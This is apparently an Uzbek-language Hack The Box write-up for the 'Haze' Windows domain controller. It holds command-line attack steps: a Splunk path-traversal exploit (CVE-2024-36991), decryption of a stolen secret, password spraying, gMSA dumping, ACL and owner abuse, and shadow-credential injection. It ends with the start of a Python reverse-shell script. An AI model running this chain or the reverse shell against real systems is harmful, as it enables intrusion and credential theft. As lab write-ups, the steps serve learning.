Half Writeup Haze
Half Writeup Haze
Umumiy Ma’lumotlar
IP address 10.10.11.61
Operatsion Tizim Nomi (Distribution) Microsoft Windows Server 2022 Standard
Operatsion Tizim Kernel Verisyasi 10.0.20348 N/A Build 20348
Web Server dasturi va Versiyasi Splunkd httpd 9.2.1
53, 88, 135, 139, 389, 445, 464, 593, 636, 3268,
Ochiq Portlar
3269, 5985, 8000, 8088, 8089
Topilgan Flaglar
💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari flag topilgan ekran screenshotini ham
ushbu bo’limga tashlang.
User Flag
Root Flag
Toplgan Zaifliklar
Haze 1
💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot olish uchun link qoldirasiz. U zaiflik
nimalarga saba bo’lishi va qaysi explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak. Birnchida
keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta zaiflik topa olsangiz barchasini kiriting.
Hisobot
💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar, foydalanilgan explitlar bilan tushuntirib yozing.
㉿
┌──(kali kali)-[~]
└─$ nmap -sSCV -Pn 10.10.11.61 -min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-29 15:16 EDT
Nmap scan report for 10.10.11.61
Host is up (0.10s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-30 03:16:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Na
me)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-N
ame)
| ssl-cert: Subject: commonName=dc01.haze.htb
Haze 2
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Na
me)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-N
ame)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
8088/tcp open ssl/http Splunkd httpd
|_http-title: 404 Not Found
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Haze 3
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.21 seconds
Bizda 8000 portda website bor endi unga kirib ko’ramiz va undan oldin /etc/hostsga domen qo’shamiz
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.61 haze.htb dc01.haze.htb
Haze 4
Exploitation (Buzib kirish)
Endi yuklab ishlatib ko’ramiz
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git
Cloning into 'CVE-2024-36991'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 22 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (22/22), 135.19 KiB | 456.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ ll
total 4
drwxrwxr-x 4 kali kali 4096 Mar 29 15:28 CVE-2024-36991
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ cd CVE-2024-36991
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ ll
total 16
-rw-rw-r-- 1 kali kali 5157 Mar 29 15:28 CVE-2024-36991.py
-rw-rw-r-- 1 kali kali 1570 Mar 29 15:28 README.md
drwxrwxr-x 2 kali kali 4096 Mar 29 15:28 screens
Haze 5
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ python3 CVE-2024-36991.py -u http://haze.htb:8000
/home/kali/Desktop/HTB/Haze/CVE-2024-36991/CVE-2024-36991.py:53: SyntaxWarning: invalid escape sequence
'\ '
""")
-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.
Bizda hash bor lekin crack qilib bo’lmadi endi burp suite bilan shu cveda ko’rsatilgandek ma’lumot olishga harakat
qilamiz
https://www.sonicwall.com/blog/critical-splunk-vulnerability-cve-2024-36991-patch-now-to-prevent-arbitrary-file-
reads
Haze 6
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
Haze 7
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
Haze 8
https://github.com/HurricaneLabs/splunksecrets
┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ git clone https://github.com/HurricaneLabs/splunksecrets.git
Cloning into 'splunksecrets'...
remote: Enumerating objects: 344, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 344 (delta 20), reused 15 (delta 15), pack-reused 321 (from 1)
Receiving objects: 100% (344/344), 89.25 KiB | 247.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.
┌──(kali㉿kali)-[~/Desktop/HTB/Haze]
└─$ cd splunksecrets
┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ python3 -m venv venv
┌──(kali㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ source venv/bin/activate
┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ pip3 install splunksecrets
Collecting splunksecrets
Downloading splunksecrets-1.0.0.tar.gz (8.4 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting click>=8.0.0 (from splunksecrets)
Using cached click-8.1.8-py3-none-any.whl.metadata (2.3 kB)
Collecting cryptography>=3.2 (from splunksecrets)
Using cached cryptography-44.0.2-cp39-abi3-manylinux_2_34_x86_64.whl.metadata (5.7 kB)
Collecting pcrypt (from splunksecrets)
Downloading pcrypt-1.0.5.tar.gz (6.0 kB)
Haze 9
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ curl -s "http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:/Progra
m%20Files/Splunk/etc/auth/splunk.secret"
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU
9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg
54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ vim splunk.secret
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ splunksecrets splunk-decrypt -S splunk.secret
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze/CVE-2024-36991]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.ht
b) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)
Haze 10
SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser"
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep "SidTypeUser" | awk -F '\\'
'{print $2}' | awk '{print $1}' > users.txt
┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
Haze 11
└─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
Endi evil-winrm orqali bog’lanishimiz mumkun bo’lgan userlarni aniqlashga harakat qilamiz va
Ld@p_Auth_Sp1unk@2k24 passwordimizda sinab ko’ramiz
㉿
┌──(venv)─(kali kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ crackmapexec winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb
HTTP 10.10.11.61 5985 10.10.11.61 [*] http://10.10.11.61:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been
moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.61 5985 10.10.11.61 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
┌──(venv)─(kali ㉿kali)-[~/Desktop/HTB/Haze/splunksecrets]
└─$ evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine
Haze 12
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co
mpletion
Group Managed Service Accounts (gMSA) olishga harakat qilamiz userimiz bilan
https://github.com/micahvandeusen/gMSADumper
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l dc01.haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> Domain Admins
==============================================================
*Evil-WinRM* PS C:\Users\mark.adams\Desktop> Set-ADServiceAccount -Identity Haze-IT-Backup$ -PrincipalsAllo
wedToRetrieveManagedPassword "mark.adams"
=========================================================================
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze/gMSADumper]
└─$ python3 gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -l haze.htb
Users or groups who can read password for Haze-IT-Backup$:
> mark.adams
Haze-IT-Backup$:::735c02c6b2dc54c3c8c6891f55279ebc
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:38c90a95f7e038a6cb57d3e21c405c2875e88f1edbb1e082f1dd75d01e
da60fd
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:0926f5e64d85018a506ecadff3df4f95
Haze 13
SUPPORT_SERVICES ob'yektining egaligini Haze-IT-Backup$ foydalanuvchisiga o'zgartiramiz
㉿
┌──(kali kali)-[~/Desktop/HTB/Haze]
└─$ impacket-owneredit -action write -target 'SUPPORT_SERVICES' -new-owner 'Haze-IT-Backup$' haze.htb/'Haz
e-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
Haze 14
/usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Siz Haze-IT-Backup$ foydalanuvchisiga SUPPORT_SERVICES ob'yekti ustidan to'liq boshqaruv huquqi beramiz
┌──(kali ㉿kali)-[~/Desktop/HTB/Haze]
└─$ impacket-dacledit -action write -rights FullControl -target 'SUPPORT_SERVICES' -principal 'Haze-IT-Backup$'
haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip haze.htb
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
Haze 15
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
https://github.com/ShutdownRepo/pywhisker
┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02
c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
Haze 16
[*] KeyCredential generated with DeviceID: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: RiINBkUx.pfx
[+] PFX exportiert nach: RiINBkUx.pfx
[i] Passwort für PFX: SShOyHNfLs34SAgndFjj
[+] Saved PFX (#PKCS12) certificate & key at path: RiINBkUx.pfx
[*] Must be used with password: SShOyHNfLs34SAgndFjj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
┌──(venv)─(kali ㉿kali)-[~/…/HTB/Haze/pywhisker/pywhisker]
└─$ python3 pywhisker.py -d haze.htb -u "Haze-IT-Backup$" -H "0926f5e64d85018a506ecadff3df4f95":"735c02
c6b2dc54c3c8c6891f55279ebc" --target "edward.martin" --action "info" --device-id 4723e9b1-4a37-1172-fb9d-d1
eb66df2975
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[+] Found device Id
<KeyCredential structure at 0x7faa2d64e0f0>
| Owner: CN=Edward Martin,CN=Users,DC=haze,DC=htb
| Version: 0x200
| KeyID: IviFPb/wwdUh53UH+fGdwoGInRQ48tTRprA4O/gv2nA=
| KeyHash: 6a97ce5142c80bb23afc87e9af501a486cca84ca457977d2bbed64849e1bb8b5
| RawKeyMaterial: <dsinternals.common.cryptography.RSAKeyMaterial.RSAKeyMaterial object at 0x7faa2d64db50
>
| | Exponent (E): 65537
| | Modulus (N): 0xea83eecdb7e534d288ec9ac838b098da752a3ca49fb57df7e16973925250fe6dedee041e457d2
4ab776733dc4af0bf8d3e26a76e8a7f50427ac7cec99eeb685ecff8ccc97d3ce8d42db1ec1d13515e9427773e9495a6
2ffc5570d35c5d7e0ccc2019b8dfbb64c3955467a515eb2386bf5db3a0605113f9510d39308f648b64a5505baa933d
df929359b21bc708a24b2c01dc26e7543f3dd2c2f56fdc3e78325e9106a1fb2888268d0edd86eb7e7204ecbeea4c41
56963bed45ca348a87412999ff2beb4c8824daec22d89051b4591981fdf144b59ef6162d4499ca774ea3c818b698cf5
aa1c20b141fbc61ecbf014f5c294268e04c422b54d2cac42ebe022565
| | Prime1 (P): 0x0
| | Prime2 (Q): 0x0
| Usage: KeyUsage.NGC
| LegacyUsage: None
| Source: KeySource.AD
| DeviceId: 4723e9b1-4a37-1172-fb9d-d1eb66df2975
| CustomKeyInfo: <CustomKeyInformation at 0x7faa2d65d590>
| | Version: 1
| | Flags: KeyFlags.NONE
| | VolumeType: None
| | SupportsNotification: None
| | FekKeyVersion: None
| | Strength: None
| | Reserved: None
| | EncodedExtendedCKI: None
| LastLogonTime (UTC): 2025-03-29 22:34:05.059959
| CreationTime (UTC): 2025-03-29 22:34:05.059959
Haze 17
dc54c3c8c6891f55279ebc" --target "edward.martin" --action "add"
Nimani qilayapti?
d haze.htb : Domain ( haze.htb ) ni belgiladik.
u "Haze-IT-Backup$" : Windows Active Directory tizimida xizmat hisob raqami yoki kompyuter hisob raqami (bu yerda
Haze-IT-Backup$ ) ni ishlatdik
-action "add" : Ushbu amal edward.martin hisobiga yangi KeyCredential (kalit) qo‘shadi.
Natija:
Siz Edward Martin foydalanuvchisiga yangi KeyCredential qo‘shdik.
Nimani qilayapti?
-action "info" : Maqsadli foydalanuvchining KeyCredential ma'lumotlarini ko‘rish uchun ishlatiladi.
Natija:
Sizga KeyCredential haqida ko‘p ma'lumotlar ko‘rsatilmoqda, jumladan:
Haze 18
Privilage Escalation (Huquqlarni oshirish)
https://github.com/0xjpuff/reverse_shell_splunk
Yuklab olamiz va
㉿
┌──(kali kali)-[~/Desktop/reverse_shell_splunk/reverse_shell_splunk/bin]
└─$ cat rev.py
import sys,socket,os,pty
ip="10.10.14.x"
port=4444
s=socket.socket()
s.connect((ip,int(port)))
